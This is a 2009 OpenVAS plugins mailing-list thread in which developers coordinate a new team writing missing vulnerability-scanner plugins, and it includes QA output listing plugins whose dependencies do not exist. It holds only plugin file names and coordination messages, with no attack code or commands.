A good idea would be to start openvasd, run a scan and have look at the openvasd.messages file. In this file, openvasd will complain about missing dependencies. Then you can look into the file and determine what the missing dependency is supposed to do and whether it is important. Another plugin developer, Michael Meyer (mime on IRC, I've put him in CC:) is working on missing depencies as well, he can probably give you some pointers. Please do coordinate with him to avoid duplicate work. It would be nice if you and/or your team could join us on IRC (#openvas on irc.oftc.net). This is usually the quickest way to get answers to questions. I have attached part of the output of a feed QA script which I'm currently developing aimed at discovering unsatisfied includes or dependencies, I hope it is useful to you. Feel free to contact me if you have any questions or suggestions. Regards, Michael -- Michael Wiegand | OpenPGP: D7D049EC | Intevation GmbH - www.intevation.de Neuer Graben 17, 49074 Osnabr?ck, Germany | AG Osnabr?ck, HR B 18998 Gesch?ftsf?hrer: Frank Koormann, Bernhard Reiter, Dr. Jan-Oliver Wagner -------------- next part -------------- Looking for plugins that have unavailable dependencies... plugin ../scripts/cisco_vpn_client_detect.nasl depends on non-existant smb_hotfixes.nasl plugin ../scripts/cubecart_xss.nasl depends on non-existant cubecart_detect.nasl plugin ../scripts/cvs_file_existence_info_weak.nasl depends on non-existant cvs_pserver_heap_overflow.nasl plugin ../scripts/cvs_malformed_entry_lines_flaw.nasl depends on non-existant cvs_pserver_heap_overflow.nasl plugin ../scripts/DDI_IIS_Compromised.nasl depends on non-existant webmirror.nasl plugin ../scripts/fs_policy_manager_7_dos.nasl depends on non-existant os_fingerprint.nasl plugin ../scripts/hydra_rexec.nasl depends on non-existant rexecd.nasl plugin ../scripts/hydra_snmp.nasl depends on non-existant snmp_settings.nasl plugin ../scripts/msrpc_dcom.nasl depends on non-existant msrpc_dcom2.nasl plugin ../scripts/nav_installed.nasl depends on non-existant smb_registry_full_access.nasl plugin ../scripts/nav_installed.nasl depends on non-existant smb_enum_services.nasl plugin ../scripts/packeteer_packetshaper_web_dos.nasl depends on non-existant snmp_sysDesc.nasl plugin ../scripts/php_fusion_6_00_110.nasl depends on non-existant php_fusion_detect.nasl plugin ../scripts/putty_arbitrary_command_execution.nasl depends on non-existant putty_version_check.nasl plugin ../scripts/relative_field_vulnerability.nasl depends on non-existant os_fingerprint.nasl plugin ../scripts/relative_field_vulnerability.nasl depends on non-existant snmp_sysDesc.nasl plugin ../scripts/remote-detect-sybase-easerver-mgmt.nasl depends on non-existant sybase_easerver_detect.nasl plugin ../scripts/rsync_path_sanitation_vuln.nasl depends on non-existant rsync_modules.nasl plugin ../scripts/savce_installed.nasl depends on non-existant smb_registry_full_access.nasl plugin ../scripts/savce_installed.nasl depends on non-existant smb_enum_services.nasl plugin ../scripts/smb_explorer_version.nasl depends on non-existant smb_registry_full_access.nasl plugin ../scripts/smb_explorer_version.nasl depends on non-existant smb_hotfixes.nasl plugin ../scripts/smb_suspicious_files.nasl depends on non-existant smb_hotfixes.nasl plugin ../scripts/sonicwall_vpn_client_detect.nasl depends on non-existant smb_hotfixes.nasl plugin ../scripts/sophos_installed.nasl depends on non-existant smb_enum_services.nasl plugin ../scripts/spybot_detection.nasl depends on non-existant smb_hotfixes.nasl plugin ../scripts/spysweeper_corp_installed.nasl depends on non-existant smb_registry_full_access.nasl plugin ../scripts/spysweeper_corp_installed.nasl depends on non-existant smb_enum_services.nasl plugin ../scripts/sybase_blank_password.nasl depends on non-existant sybase_detect.nasl plugin ../scripts/sympa_new_list_xss.nasl depends on non-existant sympa_detect.nasl plugin ../scripts/webcalendar_info_disclosure.nasl depends on non-existant webcalendar_detect.nasl plugin ../scripts/yahoo_dos.nasl depends on non-existant yahoo_msg_running.nasl plugin ../scripts/apache_conn_block.nasl depends on non-existant os_fingerprint.nasl plugin ../scripts/apache_conn_block.nasl depends on non-existant os_fingerprint.nasl plugin ../scripts/apache_conn_block.nasl depends on non-existant macosx_SecUpd20040503.nasl plugin ../scripts/apache_conn_block.nasl depends on non-existant macosx_SecUpd20040126.nasl plugin ../scripts/apache_conn_block.nasl depends on non-existant macosx_SecUpd20041202.nasl plugin ../scripts/apache_htpasswd_overflow.nasl depends on non-existant macosx_version.nasl plugin ../scripts/apache_log_injection.nasl depends on non-existant redhat-RHSA-2003-244.nasl plugin ../scripts/apache_log_injection.nasl depends on non-existant redhat_fixes.nasl plugin ../scripts/apache_log_injection.nasl depends on non-existant macosx_SecUpd20040503.nasl plugin ../scripts/apache_log_injection.nasl depends on non-existant macosx_SecUpd20040126.nasl plugin ../scripts/apache_log_injection.nasl depends on non-existant macosx_SecUpd20041202.nasl plugin ../scripts/apache_mod_include_priv_escalation.nasl depends on non-existant os_fingerprint.nasl plugin ../scripts/apache_mod_include_priv_escalation.nasl depends on non-existant macosx_SecUpd20041202.nasl plugin ../scripts/apache_mod_proxy_buff_overflow.nasl depends on non-existant os_fingerprint.nasl plugin ../scripts/apache_mod_proxy_buff_overflow.nasl depends on non-existant mandrake_MDKSA-2004-065.nasl plugin ../scripts/apache_mod_proxy_buff_overflow.nasl depends on non-existant redhat-RHSA-2004-244.nasl plugin ../scripts/apache_mod_proxy_buff_overflow.nasl depends on non-existant macosx_SecUpd20041202.nasl plugin ../scripts/apcupsd_overflows.nasl depends on non-existant apcnisd_detect.nasl plugin ../scripts/asp_source_space.nasl depends on non-existant webmirror.nasl plugin ../scripts/BEA_weblogic_Reveal_Script_Code.nasl depends on non-existant webmirror.nasl plugin ../scripts/bugzilla_remote_exec.nasl depends on non-existant bugzilla_detect.nasl plugin ../scripts/cachemgr_cgi.nasl depends on non-existant no404.nasl plugin ../scripts/cubecart_lang_xss.nasl depends on non-existant cubecart_detect.nasl plugin ../scripts/cutenews_145_xss.nasl depends on non-existant cutenews_detect.nasl plugin ../scripts/cutenews_indexphp_xss.nasl depends on non-existant cutenews_detect.nasl plugin ../scripts/cutenews_show_news_xss.nasl depends on non-existant cutenews_detect.nasl plugin ../scripts/cutenews_xss.nasl depends on non-existant cutenews_detect.nasl plugin ../scripts/cvstrac_account_deletion.nasl depends on non-existant cvstrac_detect.nasl plugin ../scripts/cvstrac_cgi_overflows.nasl depends on non-existant cvstrac_detect.nasl plugin ../scripts/cvstrac_db_plaintext_pass.nasl depends on non-existant cvstrac_detect.nasl plugin ../scripts/cvstrac_filediff.nasl depends on non-existant cvstrac_detect.nasl plugin ../scripts/cvstrac_history_overflow.nasl depends on non-existant cvstrac_detect.nasl plugin ../scripts/cvstrac_invalid_ticket_dos.nasl depends on non-existant cvstrac_detect.nasl plugin ../scripts/cvstrac_jail_escape.nasl depends on non-existant cvstrac_detect.nasl plugin ../scripts/cvstrac_output_formatter_dos.nasl depends on non-existant cvstrac_detect.nasl plugin ../scripts/cvstrac_ticket_title.nasl depends on non-existant cvstrac_detect.nasl plugin ../scripts/cvstrac_timeline_overflow.nasl depends on non-existant cvstrac_detect.nasl plugin ../scripts/e107_sql_injection.nasl depends on non-existant e107_detect.nasl plugin ../scripts/ftpglob.nasl depends on non-existant os_fingerprint.nasl plugin ../scripts/ftpglob.nasl depends on non-existant solaris251_103603.nasl plugin ../scripts/ftpglob.nasl depends on non-existant solaris251_x86_103604.nasl plugin ../scripts/ftpglob.nasl depends on non-existant solaris26_106301.nasl plugin ../scripts/ftpglob.nasl depends on non-existant solaris26_x86_106302.nasl plugin ../scripts/ftpglob.nasl depends on non-existant solaris7_110646.nasl plugin ../scripts/ftpglob.nasl depends on non-existant solaris7_x86_110647.nasl plugin ../scripts/ftpglob.nasl depends on non-existant solaris8_111606.nasl plugin ../scripts/ftpglob.nasl depends on non-existant solaris8_x86_111607.nasl plugin ../scripts/hacker_defender.nasl depends on non-existant os_fingerprint.nasl plugin ../scripts/ibm_server_code.nasl depends on non-existant webmirror.nasl plugin ../scripts/invision_power_board_calendar_sql_injection.nasl depends on non-existant invision_power_board_detect.nasl plugin ../scripts/invision_pwb.nasl depends on non-existant invision_power_board_detect.nasl plugin ../scripts/ipb_sql_disclosure.nasl depends on non-existant invision_power_board_detect.nasl plugin ../scripts/jrun_getdir.nasl depends on non-existant webmirror.nasl plugin ../scripts/limewire_remote_unauth_access.nasl depends on non-existant os_fingerprint.nasl plugin ../scripts/mailreader.nasl depends on non-existant webmirror.nasl plugin ../scripts/mod_ssl_hook_functions_format_string_vuln.nasl depends on non-existant redhat-RHSA-2004-408.nasl plugin ../scripts/mod_ssl_hook_functions_format_string_vuln.nasl depends on non-existant mandrake_MDKSA-2004-075.nasl plugin ../scripts/mssql_brute_force.nasl depends on non-existant sybase_detect.nasl plugin ../scripts/myserver_post_dos.nasl depends on non-existant www_too_long_url.nasl plugin ../scripts/nfs_user_mount.nasl depends on non-existant showmount.nasl plugin ../scripts/no404.nasl depends on non-existant webmirror.nasl plugin ../scripts/openca_mult_sign_flaws.nasl depends on non-existant openca_html_injection.nasl plugin ../scripts/openca_sign_verif.nasl depends on non-existant openca_html_injection.nasl plugin ../scripts/openssh_afs.nasl depends on non-existant redhat-RHSA-2002-131.nasl plugin ../scripts/PC_anywhere_tcp.nasl depends on non-existant os_fingerprint.nasl plugin ../scripts/phorum_register_xss.nasl depends on non-existant phorum_detect.nasl plugin ../scripts/photopost_sql_injection.nasl depends on non-existant photopost_detect.nasl plugin ../scripts/php_fusion_sql_inject.nasl depends on non-existant php_fusion_detect.nasl plugin ../scripts/php_fusion_xss.nasl depends on non-existant php_fusion_detect.nasl plugin ../scripts/phpgroupware_addressbook_flaw.nasl depends on non-existant phpgroupware_detect.nasl plugin ../scripts/phpgroupware_html_injection2.nasl depends on non-existant phpgroupware_detect.nasl plugin ../scripts/phpgroupware_html_injection.nasl depends on non-existant phpgroupware_detect.nasl plugin ../scripts/phpgroupware_message_script_inject.nasl depends on non-existant phpgroupware_detect.nasl plugin ../scripts/phpgroupware_plaintext_cookie_auth_vuln.nasl depends on non-existant phpgroupware_detect.nasl plugin ../scripts/phpgroupware_remote_cmd.nasl depends on non-existant phpgroupware_detect.nasl plugin ../scripts/phpgroupware_remote_file_include.nasl depends on non-existant phpgroupware_detect.nasl plugin ../scripts/phpgroupware_server_side_exec_vuln.nasl depends on non-existant phpgroupware_detect.nasl plugin ../scripts/phpgroupware_sql_injection.nasl depends on non-existant phpgroupware_detect.nasl plugin ../scripts/phpgroupware_xss.nasl depends on non-existant phpgroupware_detect.nasl plugin ../scripts/php_mail_func_header_spoof.nasl depends on non-existant redhat-RHSA-2002-214.nasl plugin ../scripts/phpmyfaq_action_parameter_flaw.nasl depends on non-existant phpmyfaq_detect.nasl plugin ../scripts/php_nuke_admin_cp.nasl depends on non-existant php_nuke_installed.nasl plugin ../scripts/php_nuke_bb_smilies_passwd.nasl depends on non-existant php_nuke_installed.nasl plugin ../scripts/php_nuke_sql_debug.nasl depends on non-existant php_nuke_installed.nasl plugin ../scripts/php_split_mime.nasl depends on non-existant webmirror.nasl plugin ../scripts/php_strip_tags_memory_limit_vuln.nasl depends on non-existant redhat-RHSA-2004-392.nasl plugin ../scripts/php_strip_tags_memory_limit_vuln.nasl depends on non-existant redhat-RHSA-2004-395.nasl plugin ../scripts/postnuke_news_xss.nasl depends on non-existant postnuke_detect.nasl plugin ../scripts/rpc_kcms.nasl depends on non-existant os_fingerprint.nasl plugin ../scripts/samba_arbitrary_file_access.nasl depends on non-existant smb_nativelanman.nasl plugin ../scripts/securenet_sensor_detect.nasl depends on non-existant macosx_version.nasl plugin ../scripts/sendmail_header.nasl depends on non-existant solaris26_105395.nasl plugin ../scripts/sendmail_header.nasl depends on non-existant solaris26_x86_105396.nasl plugin ../scripts/sendmail_header.nasl depends on non-existant solaris7_107684.nasl plugin ../scripts/sendmail_header.nasl depends on non-existant solaris7_x86_107685.nasl plugin ../scripts/sendmail_header.nasl depends on non-existant solaris8_110615.nasl plugin ../scripts/sendmail_header.nasl depends on non-existant solaris8_x86_110616.nasl plugin ../scripts/sendmail_header.nasl depends on non-existant solaris9_113575.nasl plugin ../scripts/sendmail_header.nasl depends on non-existant solaris9_x86_114137.nasl plugin ../scripts/serendipity_xss.nasl depends on non-existant serendipity_detect.nasl plugin ../scripts/servletExec_DoS.nasl depends on non-existant www_too_long_url.nasl plugin ../scripts/sql_injection.nasl depends on non-existant webmirror.nasl plugin ../scripts/squid_rdos.nasl depends on non-existant redhat-RHSA-2004-591.nasl plugin ../scripts/teso_telnet.nasl depends on non-existant ms_telnet_overflow.nasl plugin ../scripts/w32_spybot_worm_variant.nasl depends on non-existant os_fingerprint.nasl plugin ../scripts/webapp_apage_cmd_exe.nasl depends on non-existant webapp_detect.nasl plugin ../scripts/webcalendar_sql_injection.nasl depends on non-existant webcalendar_detect.nasl plugin ../scripts/ws4e_too_long_url.nasl depends on non-existant www_too_long_url.nasl plugin ../scripts/xoops_myheader_url_xss.nasl depends on non-existant xoops_detect.nasl plugin ../scripts/xoops_viewtopic_xss.nasl depends on non-existant xoops_detect.nasl plugin ../scripts/ypupdated_remote_exec.nasl depends on non-existant rpc_portmap.nasl Warning: 112 plugins that depend on NONEXISTANT plugins found. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 198 bytes Desc: not available Url : http://lists.wald.intevation.org/pipermail/openvas-plugins/attachments/20090330/5e8ca783/attachment.pgp From bchandra at secpod.com Mon Mar 30 14:40:50 2009 From: bchandra at secpod.com (Chandrashekhar B) Date: Mon, 30 Mar 2009 18:10:50 +0530 Subject: [Openvas-plugins] New plugin development team In-Reply-To: <8A02A3DF683DEE42BE73187F4CA4444C04CA58@vlasta.lss-net.lss.hr> References: <8A02A3DF683DEE42BE73187F4CA4444C04CA58@vlasta.lss-net.lss.hr> Message-ID: <55D893D00BE943C4BE1C6A8EDF7ABE25@bchandra> Thanks for offering to help! We had started on this exercise of reworking the missing Plugins and completed some of them. As of now, the following Plugins are missing, apcnisd_detect.nasl cisco_ids_manager_detect.nasl e107_detect.nasl invision_power_board_detect.nasl ms_telnet_overflow.nasl msrpc_dcom2.nasl openca_html_injection.nasl os_fingerprint.nasl phorum_detect.nasl php_nuke_installed.nasl phpmyfaq_detect.nasl postnuke_detect.nasl rsync_modules.nasl serendipity_detect.nasl snmp_sysDesc.nasl sybase_detect.nasl sybase_easerver_detect.nasl webcalendar_detect.nasl webmirror.nasl www_too_long_url.nasl xoops_detect.nasl yahoo_msg_running.nasl You could take some of these for development. The way to go about would be, check the Plugins that are depending on the above and analyze what they expect. In general, some missing KB item setting has to be done in the way the dependent Plugins expect. Thanks, Chandra. ________________________________________ From: openvas-plugins-bounces at wald.intevation.org [mailto:openvas-plugins-bounces at wald.intevation.org] On Behalf Of Goran Licina Sent: Monday, March 30, 2009 2:43 PM To: Openvas-plugins at wald.intevation.org Subject: [Openvas-plugins] New plugin development team Hi, in agreement with Mr. Jan-Oliver Wagner and Mr. Vlatko Kosturjak we gathered a team for developing new OpenVAS plugins. Since we would like to start with writing plugins as soon as possible, Mr. Wagner suggested that we could for a start develop missing plugins that cause other OpenVAS plugins not to work properly. So, can You please tell us on which plugin(s) we can start working on and what is the common procedure to do that? Best regards, Goran Licina -- Laboratory for Systems and Signals Department of Electronic Systems and Information Processing Faculty of Electrical Engineering and Computing University of Zagreb From c_edjenguele at yahoo.it Mon Mar 30 15:00:48 2009 From: c_edjenguele at yahoo.it (Christian Eric EDJENGUELE) Date: Mon, 30 Mar 2009 13:00:48 +0000 (GMT) Subject: [Openvas-plugins] Plugins dependencies In-Reply-To: References: Message-ID: <659770.91777.qm@web28612.mail.ukl.yahoo.com> Hello, I think the right name in script_dependencies is remote-detect-sybase-easerver.nasl Cheers. > sybase_detect.nasl > sybase_easerver_detect.nasl --- Christian Eric Edjenguele IT Security Software Developer & Researcher / Business Developer / Enterprise Software Architect mobile (IT): +39 3408580513 ----- Messaggio originale ----- > Da: "openvas-plugins-request at wald.intevation.org" > A: openvas-plugins at wald.intevation.org > Inviato: Luned? 30 marzo 2009, 14:41:09 > Oggetto: Openvas-plugins Digest, Vol 16, Issue 10 > > Send Openvas-plugins mailing list submissions to > openvas-plugins at wald.intevation.org > > To subscribe or unsubscribe via the World Wide Web, visit > http://lists.wald.intevation.org/mailman/listinfo/openvas-plugins > or, via email, send a message with subject or body 'help' to > openvas-plugins-request at wald.intevation.org > > You can reach the person managing the list at > openvas-plugins-owner at wald.intevation.org > > When replying, please edit your Subject line so it is more specific > than "Re: Contents of Openvas-plugins digest..." > > > Today's Topics: > > 1. New plugin development team (Goran Li?ina) > 2. Re: New plugin development team (Michael Wiegand) > 3. Re: New plugin development team (Chandrashekhar B) > > > ---------------------------------------------------------------------- > > Message: 1 > Date: Mon, 30 Mar 2009 11:13:19 +0200 > From: Goran Li?ina > Subject: [Openvas-plugins] New plugin development team > To: > Message-ID: > <8A02A3DF683DEE42BE73187F4CA4444C04CA58 at vlasta..lss-net.lss.hr> > Content-Type: text/plain; charset="iso-8859-2" > > Hi, > > > > in agreement with Mr. Jan-Oliver Wagner and Mr. Vlatko Kosturjak we gathered a > team for developing new OpenVAS plugins. Since we would like to start with > writing plugins as soon as possible, Mr. Wagner suggested that we could for a > start develop missing plugins that cause other OpenVAS plugins not to work > properly. > > > > So, can You please tell us on which plugin(s) we can start working on and what > is the common procedure to do that? > > > > Best regards, > > > > Goran Licina > > -- > > Laboratory for Systems and Signals > > Department of Electronic Systems and Information Processing > > Faculty of Electrical Engineering and Computing > > University of Zagreb > > > > -------------- next part -------------- > An HTML attachment was scrubbed... > URL: > http://lists.wald.intevation.org/pipermail/openvas-plugins/attachments/20090330/885bff87/attachment.htm > > ------------------------------ > > Message: 2 > Date: Mon, 30 Mar 2009 14:39:37 +0200 > From: Michael Wiegand > Subject: Re: [Openvas-plugins] New plugin development team > To: Goran Licina > Cc: Openvas-plugins at wald.intevation.org > Message-ID: <20090330123937.GF25646 at intevation.de> > Content-Type: text/plain; charset="iso-8859-15" > > * Goran Li?ina [30. Mar 2009]: > > in agreement with Mr. Jan-Oliver Wagner and Mr. Vlatko Kosturjak we > > gathered a team for developing new OpenVAS plugins. Since we would > > like to start with writing plugins as soon as possible, Mr. Wagner > > suggested that we could for a start develop missing plugins that cause > > other OpenVAS plugins not to work properly. > > That sounds very good, welcome to the OpenVAS project! :) > > > So, can You please tell us on which plugin(s) we can start working on > > and what is the common procedure to do that? > > A good idea would be to start openvasd, run a scan and have look at the > openvasd.messages file. In this file, openvasd will complain about > missing dependencies. > > Then you can look into the file and determine what the missing > dependency is supposed to do and whether it is important. > > Another plugin developer, Michael Meyer (mime on IRC, I've put him in > CC:) is working on missing depencies as well, he can probably give you > some pointers. Please do coordinate with him to avoid duplicate work. > > It would be nice if you and/or your team could join us on IRC (#openvas > on irc.oftc.net). This is usually the quickest way to get answers to > questions. > > I have attached part of the output of a feed QA script which I'm > currently developing aimed at discovering unsatisfied includes or > dependencies, I hope it is useful to you.. > > Feel free to contact me if you have any questions or suggestions.. > > Regards, > > Michael > > > -- > Michael Wiegand | OpenPGP: D7D049EC | Intevation GmbH - www.intevation.de > Neuer Graben 17, 49074 Osnabr?ck, Germany | AG Osnabr?ck, HR B 18998 > Gesch?ftsf?hrer: Frank Koormann, Bernhard Reiter, Dr. Jan-Oliver Wagner > -------------- next part -------------- > Looking for plugins that have unavailable dependencies... > plugin ../scripts/cisco_vpn_client_detect.nasl depends on non-existant > smb_hotfixes.nasl > plugin ../scripts/cubecart_xss.nasl depends on non-existant cubecart_detect.nasl > plugin ../scripts/cvs_file_existence_info_weak.nasl depends on non-existant > cvs_pserver_heap_overflow.nasl > plugin ../scripts/cvs_malformed_entry_lines_flaw.nasl depends on non-existant > cvs_pserver_heap_overflow.nasl > plugin ../scripts/DDI_IIS_Compromised.nasl depends on non-existant > webmirror.nasl > plugin ../scripts/fs_policy_manager_7_dos.nasl depends on non-existant > os_fingerprint.nasl > plugin ../scripts/hydra_rexec.nasl depends on non-existant rexecd.nasl > plugin ../scripts/hydra_snmp.nasl depends on non-existant snmp_settings.nasl > plugin ../scripts/msrpc_dcom.nasl depends on non-existant msrpc_dcom2.nasl > plugin ../scripts/nav_installed.nasl depends on non-existant > smb_registry_full_access.nasl > plugin .../scripts/nav_installed.nasl depends on non-existant > smb_enum_services..nasl > plugin ../scripts/packeteer_packetshaper_web_dos.nasl depends on non-existant > snmp_sysDesc.nasl > plugin ../scripts/php_fusion_6_00_110.nasl depends on non-existant > php_fusion_detect.nasl > plugin ../scripts/putty_arbitrary_command_execution.nasl depends on non-existant > putty_version_check.nasl > plugin ../scripts/relative_field_vulnerability..nasl depends on non-existant > os_fingerprint.nasl > plugin ../scripts/relative_field_vulnerability.nasl depends on non-existant > snmp_sysDesc.nasl > plugin ../scripts/remote-detect-sybase-easerver-mgmt.nasl depends on > non-existant sybase_easerver_detect.nasl > plugin ../scripts/rsync_path_sanitation_vuln.nasl depends on non-existant > rsync_modules.nasl > plugin ../scripts/savce_installed.nasl depends on non-existant > smb_registry_full_access.nasl > plugin ../scripts/savce_installed.nasl depends on non-existant > smb_enum_services.nasl > plugin ../scripts/smb_explorer_version.nasl depends on non-existant > smb_registry_full_access.nasl > plugin ../scripts/smb_explorer_version.nasl depends on non-existant > smb_hotfixes.nasl > plugin ../scripts/smb_suspicious_files.nasl depends on non-existant > smb_hotfixes.nasl > plugin ../scripts/sonicwall_vpn_client_detect.nasl depends on non-existant > smb_hotfixes.nasl > plugin ../scripts/sophos_installed.nasl depends on non-existant > smb_enum_services.nasl > plugin ../scripts/spybot_detection.nasl depends on non-existant > smb_hotfixes.nasl > plugin ../scripts/spysweeper_corp_installed.nasl depends on non-existant > smb_registry_full_access.nasl > plugin ../scripts/spysweeper_corp_installed.nasl depends on non-existant > smb_enum_services.nasl > plugin ../scripts/sybase_blank_password.nasl depends on non-existant > sybase_detect.nasl > plugin ../scripts/sympa_new_list_xss.nasl depends on non-existant > sympa_detect.nasl > plugin ../scripts/webcalendar_info_disclosure.nasl depends on non-existant > webcalendar_detect.nasl > plugin ../scripts/yahoo_dos.nasl depends on non-existant yahoo_msg_running.nasl > plugin ../scripts/apache_conn_block.nasl depends on non-existant > os_fingerprint.nasl > plugin ../scripts/apache_conn_block.nasl depends on non-existant > os_fingerprint.nasl > plugin ../scripts/apache_conn_block.nasl depends on non-existant > macosx_SecUpd20040503.nasl > plugin ../scripts/apache_conn_block.nasl depends on non-existant > macosx_SecUpd20040126.nasl > plugin ../scripts/apache_conn_block.nasl depends on non-existant > macosx_SecUpd20041202.nasl > plugin ../scripts/apache_htpasswd_overflow.nasl depends on non-existant > macosx_version.nasl > plugin ../scripts/apache_log_injection.nasl depends on non-existant > redhat-RHSA-2003-244.nasl > plugin ../scripts/apache_log_injection.nasl depends on non-existant > redhat_fixes.nasl > plugin ../scripts/apache_log_injection.nasl depends on non-existant > macosx_SecUpd20040503.nasl > plugin ../scripts/apache_log_injection.nasl depends on non-existant > macosx_SecUpd20040126.nasl > plugin ../scripts/apache_log_injection.nasl depends on non-existant > macosx_SecUpd20041202.nasl > plugin ../scripts/apache_mod_include_priv_escalation.nasl depends on > non-existant os_fingerprint.nasl > plugin ../scripts/apache_mod_include_priv_escalation.nasl depends on > non-existant macosx_SecUpd20041202.nasl > plugin ../scripts/apache_mod_proxy_buff_overflow.nasl depends on non-existant > os_fingerprint.nasl > plugin ../scripts/apache_mod_proxy_buff_overflow.nasl depends on non-existant > mandrake_MDKSA-2004-065.nasl > plugin ../scripts/apache_mod_proxy_buff_overflow.nasl depends on non-existant > redhat-RHSA-2004-244.nasl > plugin ../scripts/apache_mod_proxy_buff_overflow.nasl depends on non-existant > macosx_SecUpd20041202.nasl > plugin ../scripts/apcupsd_overflows.nasl depends on non-existant > apcnisd_detect.nasl > plugin ../scripts/asp_source_space.nasl depends on non-existant webmirror.nasl > plugin ../scripts/BEA_weblogic_Reveal_Script_Code.nasl depends on non-existant > webmirror.nasl > plugin ../scripts/bugzilla_remote_exec.nasl depends on non-existant > bugzilla_detect.nasl > plugin ../scripts/cachemgr_cgi.nasl depends on non-existant no404.nasl > plugin ../scripts/cubecart_lang_xss.nasl depends on non-existant > cubecart_detect.nasl > plugin ../scripts/cutenews_145_xss.nasl depends on non-existant > cutenews_detect.nasl > plugin ../scripts/cutenews_indexphp_xss.nasl depends on non-existant > cutenews_detect.nasl > plugin ../scripts/cutenews_show_news_xss.nasl depends on non-existant > cutenews_detect.nasl > plugin ../scripts/cutenews_xss.nasl depends on non-existant cutenews_detect.nasl > plugin ../scripts/cvstrac_account_deletion.nasl depends on non-existant > cvstrac_detect.nasl > plugin ../scripts/cvstrac_cgi_overflows.nasl depends on non-existant > cvstrac_detect.nasl > plugin ../scripts/cvstrac_db_plaintext_pass.nasl depends on non-existant > cvstrac_detect.nasl > plugin ../scripts/cvstrac_filediff.nasl depends on non-existant > cvstrac_detect.nasl > plugin ../scripts/cvstrac_history_overflow.nasl depends on non-existant > cvstrac_detect.nasl > plugin ../scripts/cvstrac_invalid_ticket_dos.nasl depends on non-existant > cvstrac_detect.nasl > plugin ../scripts/cvstrac_jail_escape.nasl depends on non-existant > cvstrac_detect.nasl > plugin ../scripts/cvstrac_output_formatter_dos.nasl depends on non-existant > cvstrac_detect.nasl > plugin ../scripts/cvstrac_ticket_title.nasl depends on non-existant > cvstrac_detect.nasl > plugin ../scripts/cvstrac_timeline_overflow.nasl depends on non-existant > cvstrac_detect.nasl > plugin ../scripts/e107_sql_injection.nasl depends on non-existant > e107_detect.nasl > plugin ../scripts/ftpglob.nasl depends on non-existant os_fingerprint.nasl > plugin ../scripts/ftpglob.nasl depends on non-existant solaris251_103603.nasl > plugin ../scripts/ftpglob.nasl depends on non-existant > solaris251_x86_103604.nasl > plugin ../scripts/ftpglob.nasl depends on non-existant solaris26_106301.nasl > plugin ../scripts/ftpglob.nasl depends on non-existant solaris26_x86_106302.nasl > plugin ../scripts/ftpglob.nasl depends on non-existant solaris7_110646.nasl > plugin ../scripts/ftpglob.nasl depends on non-existant solaris7_x86_110647.nasl > plugin ../scripts/ftpglob.nasl depends on non-existant solaris8_111606..nasl > plugin ../scripts/ftpglob.nasl depends on non-existant solaris8_x86_111607.nasl > plugin ../scripts/hacker_defender.nasl depends on non-existant > os_fingerprint.nasl > plugin ../scripts/ibm_server_code.nasl depends on non-existant webmirror.nasl > plugin ../scripts/invision_power_board_calendar_sql_injection.nasl depends on > non-existant invision_power_board_detect.nasl > plugin ../scripts/invision_pwb.nasl depends on non-existant > invision_power_board_detect.nasl > plugin ../scripts/ipb_sql_disclosure.nasl depends on non-existant > invision_power_board_detect.nasl > plugin ../scripts/jrun_getdir.nasl depends on non-existant webmirror.nasl > plugin ../scripts/limewire_remote_unauth_access.nasl depends on non-existant > os_fingerprint.nasl > plugin ../scripts/mailreader.nasl depends on non-existant webmirror.nasl > plugin ../scripts/mod_ssl_hook_functions_format_string_vuln.nasl depends on > non-existant redhat-RHSA-2004-408.nasl > plugin ../scripts/mod_ssl_hook_functions_format_string_vuln.nasl depends on > non-existant mandrake_MDKSA-2004-075.nasl > plugin ../scripts/mssql_brute_force.nasl depends on non-existant > sybase_detect.nasl > plugin ../scripts/myserver_post_dos.nasl depends on non-existant > www_too_long_url.nasl > plugin ../scripts/nfs_user_mount.nasl depends on non-existant showmount.nasl > plugin ../scripts/no404.nasl depends on non-existant webmirror.nasl > plugin ../scripts/openca_mult_sign_flaws.nasl depends on non-existant > openca_html_injection.nasl > plugin ../scripts/openca_sign_verif.nasl depends on non-existant > openca_html_injection.nasl > plugin ../scripts/openssh_afs.nasl depends on non-existant > redhat-RHSA-2002-131.nasl > plugin ../scripts/PC_anywhere_tcp.nasl depends on non-existant > os_fingerprint.nasl > plugin ../scripts/phorum_register_xss.nasl depends on non-existant > phorum_detect.nasl > plugin ../scripts/photopost_sql_injection.nasl depends on non-existant > photopost_detect.nasl > plugin ../scripts/php_fusion_sql_inject.nasl depends on non-existant > php_fusion_detect.nasl > plugin ../scripts/php_fusion_xss.nasl depends on non-existant > php_fusion_detect.nasl > plugin ../scripts/phpgroupware_addressbook_flaw.nasl depends on non-existant > phpgroupware_detect.nasl > plugin ../scripts/phpgroupware_html_injection2.nasl depends on non-existant > phpgroupware_detect.nasl > plugin ../scripts/phpgroupware_html_injection.nasl depends on non-existant > phpgroupware_detect.nasl > plugin ../scripts/phpgroupware_message_script_inject.nasl depends on > non-existant phpgroupware_detect.nasl > plugin ../scripts/phpgroupware_plaintext_cookie_auth_vuln.nasl depends on > non-existant phpgroupware_detect.nasl > plugin ../scripts/phpgroupware_remote_cmd.nasl depends on non-existant > phpgroupware_detect.nasl > plugin ../scripts/phpgroupware_remote_file_include.nasl depends on non-existant > phpgroupware_detect.nasl > plugin ../scripts/phpgroupware_server_side_exec_vuln.nasl depends on > non-existant phpgroupware_detect.nasl > plugin ../scripts/phpgroupware_sql_injection.nasl depends on non-existant > phpgroupware_detect.nasl > plugin ../scripts/phpgroupware_xss.nasl depends on non-existant > phpgroupware_detect.nasl > plugin ../scripts/php_mail_func_header_spoof.nasl depends on non-existant > redhat-RHSA-2002-214.nasl > plugin ../scripts/phpmyfaq_action_parameter_flaw.nasl depends on non-existant > phpmyfaq_detect.nasl > plugin ../scripts/php_nuke_admin_cp.nasl depends on non-existant > php_nuke_installed.nasl > plugin ../scripts/php_nuke_bb_smilies_passwd.nasl depends on non-existant > php_nuke_installed.nasl > plugin ../scripts/php_nuke_sql_debug.nasl depends on non-existant > php_nuke_installed.nasl > plugin ../scripts/php_split_mime.nasl depends on non-existant webmirror.nasl > plugin .../scripts/php_strip_tags_memory_limit_vuln.nasl depends on non-existant > redhat-RHSA-2004-392.nasl > plugin ../scripts/php_strip_tags_memory_limit_vuln.nasl depends on non-existant > redhat-RHSA-2004-395.nasl > plugin ../scripts/postnuke_news_xss.nasl depends on non-existant > postnuke_detect.nasl > plugin ../scripts/rpc_kcms.nasl depends on non-existant os_fingerprint.nasl > plugin 